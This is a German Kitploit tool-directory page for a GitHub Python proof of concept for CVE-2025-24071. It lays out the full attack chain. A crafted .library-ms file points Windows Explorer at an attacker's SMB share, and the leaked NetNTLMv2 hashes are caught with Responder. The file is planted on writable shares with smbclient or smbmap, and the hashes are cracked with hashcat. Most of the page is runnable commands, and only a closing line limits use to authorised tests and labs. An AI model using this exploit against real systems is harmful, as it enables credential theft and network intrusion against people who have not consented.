Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
PoC-CVE-2025-24071 — Python-PoC für CVE-2025-24071, das eine .library-ms-Datei erstellt, um den Windows-Explorer dazu zu bringen, NetNTLMv2-Hashes über SMB preiszugeben, damit sie abgefangen und geknackt werden können. | Kitploit
Tools/GitHubGitHub/daemon-404/poc-cve-2025-24071
PasswortangriffeSchwachstellenanalyseExploitationNetzwerksicherheitCTFPenetrationstestsRed TeamingLabs & Praxis

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHub
daemon-404/poc-cve-2025-24071

PoC-CVE-2025-24071

Python-PoC für CVE-2025-24071, das eine .library-ms-Datei erstellt, um den Windows-Explorer dazu zu bringen, NetNTLMv2-Hashes über SMB preiszugeben, damit sie abgefangen und geknackt werden können.

Repository anzeigen
vor 13h 56mNoch nicht geprüft

❀ coerce-library

CVE-2025-24071 — .library-ms NTLM-Coercion (SMB-/TAR-Methode)

Theme: Rosé Pine Python: 3.9+ CVE: 2025-24071

Protocol: SMB Capture: NetNTLMv2 Use: Lab / CTF


❀ Was es tut

Fragt nach deiner Angreifer-IP und einem Dateinamen, schreibt eine .library-ms, die auf \\<IP>\share zeigt, und packt sie in exploit.tar. Wenn der Explorer den Ordner durchsucht, in dem die lose .library-ms landet, löst er diesen UNC-Pfad automatisch auf und leakt die NTLMv2 des Kontos an deinen Listener — kein Klick nötig.

⚠️ Die lose .library-ms ist das, was ausgelöst wird — nicht die .tar. Eine .tar, die auf der Freigabe liegt, ist inert; der Explorer parst keine Tarballs. Du musst die .library-ms selbst als lose Datei auf die Freigabe bringen. Wie du das machst, hängt vom Tool ab (siehe unten).


❀ Ausführen

root@kitploit:~
uv run coerce_library.py      # or: python3 coerce_library.py
root@kitploit:~
Attack IP [10.10.14.197]:
File name [documents]:
[+] documents.library-ms  ->  \\10.10.14.197\share
[+] packed into exploit.tar

❀ Dann

1) Lauschen

root@kitploit:~
sudo responder -I tun0

2) Die .library-ms auf eine beschreibbare Freigabe bringen

smbclient — lade die .tar hoch, entpacke sie serverseitig mit tar x (legt die lose .library-ms daneben ab):

root@kitploit:~
smbclient //<TARGET>/<SHARE> -U '<DOMAIN>/<USER>%<PASS>' -c 'put exploit.tar; tar x exploit.tar'

smbmap — hat keinen Entpackungsschritt, also lade die lose .library-ms direkt hoch (die .tar hier hochzuladen bringt nichts — sie kann nicht entpackt werden):

root@kitploit:~
smbmap -H <TARGET> -d <DOMAIN> -u <USER> -p <PASS> --upload exploit.library-ms 'IT/exploit.library-ms'

Bestätige, dass sie lose auf der Freigabe gelandet ist:

root@kitploit:~
smbclient //<TARGET>/<SHARE> -U '<DOMAIN>/<USER>%<PASS>' -c 'ls' | grep library

3) Die erfasste NTLMv2 knacken

root@kitploit:~
hashcat -m 5600 hash.txt /usr/share/wordlists/rockyou.txt

☧ nur für autorisierte Penetrationstests / CTF / Laborumgebungen ☧

Tool herunterladen